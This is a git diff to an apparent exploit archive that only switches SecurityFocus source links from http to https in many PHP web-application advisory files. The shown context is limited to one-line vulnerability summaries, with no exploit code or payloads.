http://www.securityfocus.com/bid/23964/info +source: https://www.securityfocus.com/bid/23964/info SonicBB is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30036.html b/exploits/php/webapps/30036.html index de8c10641..f0df4e0f1 100644 --- a/exploits/php/webapps/30036.html +++ b/exploits/php/webapps/30036.html @@ -1,4 +1,4 @@ - diff --git a/exploits/php/webapps/30040.txt b/exploits/php/webapps/30040.txt index 795411258..111d387c0 100644 --- a/exploits/php/webapps/30040.txt +++ b/exploits/php/webapps/30040.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23989/info +source: https://www.securityfocus.com/bid/23989/info Jetbox CMS is prone to an input-validation vulnerabilitiy because it fails to adequately sanitize user-supplied input. diff --git a/exploits/php/webapps/30041.txt b/exploits/php/webapps/30041.txt index 4cb7308e2..c266ec2d3 100644 --- a/exploits/php/webapps/30041.txt +++ b/exploits/php/webapps/30041.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23999/info +source: https://www.securityfocus.com/bid/23999/info Jetbox CMS is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30042.txt b/exploits/php/webapps/30042.txt index 53c5f31e8..57737a2e3 100644 --- a/exploits/php/webapps/30042.txt +++ b/exploits/php/webapps/30042.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23999/info +source: https://www.securityfocus.com/bid/23999/info Jetbox CMS is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30047.txt b/exploits/php/webapps/30047.txt index 993767ddb..e32d74c49 100644 --- a/exploits/php/webapps/30047.txt +++ b/exploits/php/webapps/30047.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24020/info +source: https://www.securityfocus.com/bid/24020/info vBulletin is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/30050.html b/exploits/php/webapps/30050.html index 4331cef74..8f643370e 100644 --- a/exploits/php/webapps/30050.html +++ b/exploits/php/webapps/30050.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24037/info +source: https://www.securityfocus.com/bid/24037/info Redoable is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30051.txt b/exploits/php/webapps/30051.txt index 97beb424b..6daa2339a 100644 --- a/exploits/php/webapps/30051.txt +++ b/exploits/php/webapps/30051.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24039/info +source: https://www.securityfocus.com/bid/24039/info PsychoStats is prone to a path-disclosure issue when invalid data is submitted. diff --git a/exploits/php/webapps/30053.txt b/exploits/php/webapps/30053.txt index f2a63a14b..e11e1228a 100644 --- a/exploits/php/webapps/30053.txt +++ b/exploits/php/webapps/30053.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24061/info +source: https://www.securityfocus.com/bid/24061/info ClientExec is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30064.txt b/exploits/php/webapps/30064.txt index 2b4430ae1..b0a33b49c 100644 --- a/exploits/php/webapps/30064.txt +++ b/exploits/php/webapps/30064.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24063/info +source: https://www.securityfocus.com/bid/24063/info HLstats is prone to mulitiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30065.html b/exploits/php/webapps/30065.html index 38cc908d7..41c80bd09 100644 --- a/exploits/php/webapps/30065.html +++ b/exploits/php/webapps/30065.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24066/info +source: https://www.securityfocus.com/bid/24066/info GaliX is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30066.txt b/exploits/php/webapps/30066.txt index b6de4283a..c6c3b90d9 100644 --- a/exploits/php/webapps/30066.txt +++ b/exploits/php/webapps/30066.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24077/info +source: https://www.securityfocus.com/bid/24077/info Jetbox is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30068.txt b/exploits/php/webapps/30068.txt index 3d7fdb2c8..e9cf54075 100644 --- a/exploits/php/webapps/30068.txt +++ b/exploits/php/webapps/30068.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24095/info +source: https://www.securityfocus.com/bid/24095/info Jetbox CMS is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/30070.html b/exploits/php/webapps/30070.html index 4f6f36e58..de772c300 100644 --- a/exploits/php/webapps/30070.html +++ b/exploits/php/webapps/30070.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24101/info +source: https://www.securityfocus.com/bid/24101/info ClonusWiki is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/30071.txt b/exploits/php/webapps/30071.txt index 30e93805d..6a7f8149f 100644 --- a/exploits/php/webapps/30071.txt +++ b/exploits/php/webapps/30071.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24103/info +source: https://www.securityfocus.com/bid/24103/info ABC Excel Parser Pro is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30073.txt b/exploits/php/webapps/30073.txt index bd3836a6f..6157fbb82 100644 --- a/exploits/php/webapps/30073.txt +++ b/exploits/php/webapps/30073.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24108/info +source: https://www.securityfocus.com/bid/24108/info GMTT Music Distro is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/30075.txt b/exploits/php/webapps/30075.txt index 4f66758bf..62f25fc0d 100644 --- a/exploits/php/webapps/30075.txt +++ b/exploits/php/webapps/30075.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24115/info +source: https://www.securityfocus.com/bid/24115/info phpPgAdmin is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/30076.txt b/exploits/php/webapps/30076.txt index 3f26a470a..38c00f276 100644 --- a/exploits/php/webapps/30076.txt +++ b/exploits/php/webapps/30076.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24117/info +source: https://www.securityfocus.com/bid/24117/info WÝYS is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/30079.txt b/exploits/php/webapps/30079.txt index b57fcf416..8b7ea79c7 100644 --- a/exploits/php/webapps/30079.txt +++ b/exploits/php/webapps/30079.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24122/info +source: https://www.securityfocus.com/bid/24122/info 2z Project is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/30081.txt b/exploits/php/webapps/30081.txt index 800579deb..3c060f2e7 100644 --- a/exploits/php/webapps/30081.txt +++ b/exploits/php/webapps/30081.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24135/info +source: https://www.securityfocus.com/bid/24135/info ASP-Nuke is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/30082.txt b/exploits/php/webapps/30082.txt index d969aa69f..f2916a14a 100644 --- a/exploits/php/webapps/30082.txt +++ b/exploits/php/webapps/30082.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24152/info +source: https://www.securityfocus.com/bid/24152/info Gnuturk is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/30086.txt b/exploits/php/webapps/30086.txt index 0faf2d5f9..b12571db1 100644 --- a/exploits/php/webapps/30086.txt +++ b/exploits/php/webapps/30086.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24156/info +source: https://www.securityfocus.com/bid/24156/info BoastMachine is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/30087.txt b/exploits/php/webapps/30087.txt index 7d858d895..e8904d089 100644 --- a/exploits/php/webapps/30087.txt +++ b/exploits/php/webapps/30087.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24157/info +source: https://www.securityfocus.com/bid/24157/info Digirez is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30088.txt b/exploits/php/webapps/30088.txt index ef6ea7b8f..f79a09dbc 100644 --- a/exploits/php/webapps/30088.txt +++ b/exploits/php/webapps/30088.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24158/info +source: https://www.securityfocus.com/bid/24158/info Pligg is prone to a security-bypass vulnerability due to a design error when resetting forgotten passwords. diff --git a/exploits/php/webapps/30090.txt b/exploits/php/webapps/30090.txt index 53692d5ad..09254ad27 100644 --- a/exploits/php/webapps/30090.txt +++ b/exploits/php/webapps/30090.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24182/info +source: https://www.securityfocus.com/bid/24182/info phpPgAdmin is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/30092.txt b/exploits/php/webapps/30092.txt index 89924fca4..50edbb6e0 100644 --- a/exploits/php/webapps/30092.txt +++ b/exploits/php/webapps/30092.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24190/info +source: https://www.securityfocus.com/bid/24190/info FlashChat is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/30094.txt b/exploits/php/webapps/30094.txt index ea1b3eec5..bc2fef84b 100644 --- a/exploits/php/webapps/30094.txt +++ b/exploits/php/webapps/30094.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24200/info +source: https://www.securityfocus.com/bid/24200/info DGNews is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/30095.txt b/exploits/php/webapps/30095.txt index 49f56a9c8..458a6eaa5 100644 --- a/exploits/php/webapps/30095.txt +++ b/exploits/php/webapps/30095.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24201/info +source: https://www.securityfocus.com/bid/24201/info DGNews is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/30097.txt b/exploits/php/webapps/30097.txt index 40a5fd75f..5abbb083d 100644 --- a/exploits/php/webapps/30097.txt +++ b/exploits/php/webapps/30097.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24210/info +source: https://www.securityfocus.com/bid/24210/info Uebimiau is prone to multiple input-validation vulnerabilities, including cross-site scripting issues and an information-disclosure issue, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30098.txt b/exploits/php/webapps/30098.txt index 2afb18d93..93762be14 100644 --- a/exploits/php/webapps/30098.txt +++ b/exploits/php/webapps/30098.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24210/info +source: https://www.securityfocus.com/bid/24210/info Uebimiau is prone to multiple input-validation vulnerabilities, including cross-site scripting issues and an information-disclosure issue, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30099.txt b/exploits/php/webapps/30099.txt index 1c4839e83..6ae50cea5 100644 --- a/exploits/php/webapps/30099.txt +++ b/exploits/php/webapps/30099.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24212/info +source: https://www.securityfocus.com/bid/24212/info DGNews is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/30101.txt b/exploits/php/webapps/30101.txt index 9ec88f5c8..1f313daa4 100644 --- a/exploits/php/webapps/30101.txt +++ b/exploits/php/webapps/30101.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24223/info +source: https://www.securityfocus.com/bid/24223/info cpCommerce is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30102.php b/exploits/php/webapps/30102.php index eb26de214..a76a38884 100644 --- a/exploits/php/webapps/30102.php +++ b/exploits/php/webapps/30102.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24227/info +source: https://www.securityfocus.com/bid/24227/info Pheap is prone to an authentication-bypass vulnerability due to a design error. diff --git a/exploits/php/webapps/30103.txt b/exploits/php/webapps/30103.txt index 33df8e33d..ab8a248a7 100644 --- a/exploits/php/webapps/30103.txt +++ b/exploits/php/webapps/30103.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24232/info +source: https://www.securityfocus.com/bid/24232/info Particle Blogger is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30109.txt b/exploits/php/webapps/30109.txt index 0969c9ed6..2352b01d1 100644 --- a/exploits/php/webapps/30109.txt +++ b/exploits/php/webapps/30109.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24236/info +source: https://www.securityfocus.com/bid/24236/info Particle Gallery is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30111.txt b/exploits/php/webapps/30111.txt index f79cdb459..81973eea4 100644 --- a/exploits/php/webapps/30111.txt +++ b/exploits/php/webapps/30111.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24249/info +source: https://www.securityfocus.com/bid/24249/info myBloggie is prone to an SQL-injection vulnerability. diff --git a/exploits/php/webapps/30112.txt b/exploits/php/webapps/30112.txt index ed09c2046..9e58076b0 100644 --- a/exploits/php/webapps/30112.txt +++ b/exploits/php/webapps/30112.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24253/info +source: https://www.securityfocus.com/bid/24253/info PHP JackKnife is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues. diff --git a/exploits/php/webapps/30113.txt b/exploits/php/webapps/30113.txt index d356405bd..d90a168eb 100644 --- a/exploits/php/webapps/30113.txt +++ b/exploits/php/webapps/30113.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24253/info +source: https://www.securityfocus.com/bid/24253/info PHP JackKnife is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues. diff --git a/exploits/php/webapps/30114.txt b/exploits/php/webapps/30114.txt index 6227e5a63..313f6f0bd 100644 --- a/exploits/php/webapps/30114.txt +++ b/exploits/php/webapps/30114.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24253/info +source: https://www.securityfocus.com/bid/24253/info PHP JackKnife is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues. diff --git a/exploits/php/webapps/30115.txt b/exploits/php/webapps/30115.txt index 15df1ff4c..c1e6dfac3 100644 --- a/exploits/php/webapps/30115.txt +++ b/exploits/php/webapps/30115.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24253/info +source: https://www.securityfocus.com/bid/24253/info PHP JackKnife is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues. diff --git a/exploits/php/webapps/30116.txt b/exploits/php/webapps/30116.txt index 33a58a63e..f27f65c7f 100644 --- a/exploits/php/webapps/30116.txt +++ b/exploits/php/webapps/30116.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24253/info +source: https://www.securityfocus.com/bid/24253/info PHP JackKnife is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues. diff --git a/exploits/php/webapps/30118.txt b/exploits/php/webapps/30118.txt index a360cd234..364b65531 100644 --- a/exploits/php/webapps/30118.txt +++ b/exploits/php/webapps/30118.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24266/info +source: https://www.securityfocus.com/bid/24266/info 'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/30119.txt b/exploits/php/webapps/30119.txt index 8ad9fe850..a4f3b0aeb 100644 --- a/exploits/php/webapps/30119.txt +++ b/exploits/php/webapps/30119.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24266/info +source: https://www.securityfocus.com/bid/24266/info 'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/30120.txt b/exploits/php/webapps/30120.txt index 9ab90b86a..b66d36b74 100644 --- a/exploits/php/webapps/30120.txt +++ b/exploits/php/webapps/30120.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24266/info +source: https://www.securityfocus.com/bid/24266/info 'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/30121.txt b/exploits/php/webapps/30121.txt index 799e659e1..1446b1843 100644 --- a/exploits/php/webapps/30121.txt +++ b/exploits/php/webapps/30121.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24266/info +source: https://www.securityfocus.com/bid/24266/info 'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/30122.txt b/exploits/php/webapps/30122.txt index 4c2433a8f..f4048f05c 100644 --- a/exploits/php/webapps/30122.txt +++ b/exploits/php/webapps/30122.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24266/info +source: https://www.securityfocus.com/bid/24266/info 'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/30123.txt b/exploits/php/webapps/30123.txt index 075daa27d..883ad1a2f 100644 --- a/exploits/php/webapps/30123.txt +++ b/exploits/php/webapps/30123.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24266/info +source: https://www.securityfocus.com/bid/24266/info 'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/30124.txt b/exploits/php/webapps/30124.txt index 7560b4ced..616d494f5 100644 --- a/exploits/php/webapps/30124.txt +++ b/exploits/php/webapps/30124.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24266/info +source: https://www.securityfocus.com/bid/24266/info 'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/30125.txt b/exploits/php/webapps/30125.txt index 18814f09a..b03785edb 100644 --- a/exploits/php/webapps/30125.txt +++ b/exploits/php/webapps/30125.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24266/info +source: https://www.securityfocus.com/bid/24266/info 'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/30126.txt b/exploits/php/webapps/30126.txt index 40712f3a4..78d0a6ac6 100644 --- a/exploits/php/webapps/30126.txt +++ b/exploits/php/webapps/30126.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24266/info +source: https://www.securityfocus.com/bid/24266/info 'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/30127.txt b/exploits/php/webapps/30127.txt index 3510744c9..234ce1fae 100644 --- a/exploits/php/webapps/30127.txt +++ b/exploits/php/webapps/30127.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24266/info +source: https://www.securityfocus.com/bid/24266/info 'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/30128.txt b/exploits/php/webapps/30128.txt index ce41e5bb8..de4993c09 100644 --- a/exploits/php/webapps/30128.txt +++ b/exploits/php/webapps/30128.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24266/info +source: https://www.securityfocus.com/bid/24266/info 'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/30129.txt b/exploits/php/webapps/30129.txt index d16e29c9b..fbeb7e6b0 100644 --- a/exploits/php/webapps/30129.txt +++ b/exploits/php/webapps/30129.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24266/info +source: https://www.securityfocus.com/bid/24266/info 'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/30131.txt b/exploits/php/webapps/30131.txt index 3cbf974f2..74869e0bc 100644 --- a/exploits/php/webapps/30131.txt +++ b/exploits/php/webapps/30131.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24269/info +source: https://www.securityfocus.com/bid/24269/info Buttercup WFM (Web File Manager) is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30132.txt b/exploits/php/webapps/30132.txt index 6bd6111f3..47d38330c 100644 --- a/exploits/php/webapps/30132.txt +++ b/exploits/php/webapps/30132.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24270/info +source: https://www.securityfocus.com/bid/24270/info Evenzia CMS is prone to a cross-site script vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30133.txt b/exploits/php/webapps/30133.txt index f54e13c44..bc7855c39 100644 --- a/exploits/php/webapps/30133.txt +++ b/exploits/php/webapps/30133.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24276/info +source: https://www.securityfocus.com/bid/24276/info PHP Live! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30134.txt b/exploits/php/webapps/30134.txt index 31d8629bf..20a6d31df 100644 --- a/exploits/php/webapps/30134.txt +++ b/exploits/php/webapps/30134.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24276/info +source: https://www.securityfocus.com/bid/24276/info PHP Live! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30135.txt b/exploits/php/webapps/30135.txt index a533944d5..49057609d 100644 --- a/exploits/php/webapps/30135.txt +++ b/exploits/php/webapps/30135.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24276/info +source: https://www.securityfocus.com/bid/24276/info PHP Live! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30136.txt b/exploits/php/webapps/30136.txt index ee3193c96..26f34301d 100644 --- a/exploits/php/webapps/30136.txt +++ b/exploits/php/webapps/30136.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24276/info +source: https://www.securityfocus.com/bid/24276/info PHP Live! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30137.txt b/exploits/php/webapps/30137.txt index 5b27ee733..001750c39 100644 --- a/exploits/php/webapps/30137.txt +++ b/exploits/php/webapps/30137.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24276/info +source: https://www.securityfocus.com/bid/24276/info PHP Live! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30138.txt b/exploits/php/webapps/30138.txt index 79d1a616e..1034463c6 100644 --- a/exploits/php/webapps/30138.txt +++ b/exploits/php/webapps/30138.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24277/info +source: https://www.securityfocus.com/bid/24277/info Codelib Linker is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30140.txt b/exploits/php/webapps/30140.txt index c0f5db219..0d772441b 100644 --- a/exploits/php/webapps/30140.txt +++ b/exploits/php/webapps/30140.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24285/info +source: https://www.securityfocus.com/bid/24285/info Okyanusmedya is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30143.txt b/exploits/php/webapps/30143.txt index 6d5266963..470ef14e0 100644 --- a/exploits/php/webapps/30143.txt +++ b/exploits/php/webapps/30143.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24297/info +source: https://www.securityfocus.com/bid/24297/info WebStudio CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30152.txt b/exploits/php/webapps/30152.txt index 9ef06dd17..87c39ed8b 100644 --- a/exploits/php/webapps/30152.txt +++ b/exploits/php/webapps/30152.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24311/info +source: https://www.securityfocus.com/bid/24311/info My DataBook is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues. diff --git a/exploits/php/webapps/30153.txt b/exploits/php/webapps/30153.txt index 3696a8aa4..9abbb4c9b 100644 --- a/exploits/php/webapps/30153.txt +++ b/exploits/php/webapps/30153.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24311/info +source: https://www.securityfocus.com/bid/24311/info My DataBook is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues. diff --git a/exploits/php/webapps/30157.txt b/exploits/php/webapps/30157.txt index 0689c5d17..602da8605 100644 --- a/exploits/php/webapps/30157.txt +++ b/exploits/php/webapps/30157.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24342/info +source: https://www.securityfocus.com/bid/24342/info JD-Wiki is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30158.txt b/exploits/php/webapps/30158.txt index b24778463..43b7e09e1 100644 --- a/exploits/php/webapps/30158.txt +++ b/exploits/php/webapps/30158.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24342/info +source: https://www.securityfocus.com/bid/24342/info JD-Wiki is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30161.txt b/exploits/php/webapps/30161.txt index 7ae56312b..ec1833c27 100644 --- a/exploits/php/webapps/30161.txt +++ b/exploits/php/webapps/30161.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24363/info +source: https://www.securityfocus.com/bid/24363/info Atom PhotoBlog is prone to multiple input-validation vulnerabilities because it fails to adequately sanitize user-supplied input data before rendering it in a user's browser. These issues include multiple HTML-injection vulnerabilities and a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/30162.txt b/exploits/php/webapps/30162.txt index 17070af97..28aab2b44 100644 --- a/exploits/php/webapps/30162.txt +++ b/exploits/php/webapps/30162.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24365/info +source: https://www.securityfocus.com/bid/24365/info WmsCMS is prone to multiple cross-site scripting vulnerabilities because it fails to adequately sanitize user-supplied input data before rendering it in a user's browser. diff --git a/exploits/php/webapps/30166.txt b/exploits/php/webapps/30166.txt index df37f1e64..9698e6cc5 100644 --- a/exploits/php/webapps/30166.txt +++ b/exploits/php/webapps/30166.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24383/info +source: https://www.securityfocus.com/bid/24383/info WordPress is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30168.txt b/exploits/php/webapps/30168.txt index 143c4da88..a33eb00e6 100644 --- a/exploits/php/webapps/30168.txt +++ b/exploits/php/webapps/30168.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24397/info +source: https://www.securityfocus.com/bid/24397/info vBSupport is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30170.txt b/exploits/php/webapps/30170.txt index 39af4d21c..3017aa2c4 100644 --- a/exploits/php/webapps/30170.txt +++ b/exploits/php/webapps/30170.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24413/info +source: https://www.securityfocus.com/bid/24413/info Beehive Forum is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30171.txt b/exploits/php/webapps/30171.txt index ea260acca..d3d03f037 100644 --- a/exploits/php/webapps/30171.txt +++ b/exploits/php/webapps/30171.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24414/info +source: https://www.securityfocus.com/bid/24414/info Just For Fun Network Management and Monitoring System (JFFNMS) is prone to multiple remote vulnerabilities, including a cross-site scripting issue, an SQL-injection issue, and multiple information-disclosure issues. diff --git a/exploits/php/webapps/30172.txt b/exploits/php/webapps/30172.txt index 73211be2a..327df601c 100644 --- a/exploits/php/webapps/30172.txt +++ b/exploits/php/webapps/30172.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24414/info +source: https://www.securityfocus.com/bid/24414/info Just For Fun Network Management and Monitoring System (JFFNMS) is prone to multiple remote vulnerabilities, including a cross-site scripting issue, an SQL-injection issue, and multiple information-disclosure issues. diff --git a/exploits/php/webapps/30173.txt b/exploits/php/webapps/30173.txt index 1a986ed51..0a1e6f3ce 100644 --- a/exploits/php/webapps/30173.txt +++ b/exploits/php/webapps/30173.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24414/info +source: https://www.securityfocus.com/bid/24414/info Just For Fun Network Management and Monitoring System (JFFNMS) is prone to multiple remote vulnerabilities, including a cross-site scripting issue, an SQL-injection issue, and multiple information-disclosure issues. diff --git a/exploits/php/webapps/30174.txt b/exploits/php/webapps/30174.txt index c70e455fe..6be823507 100644 --- 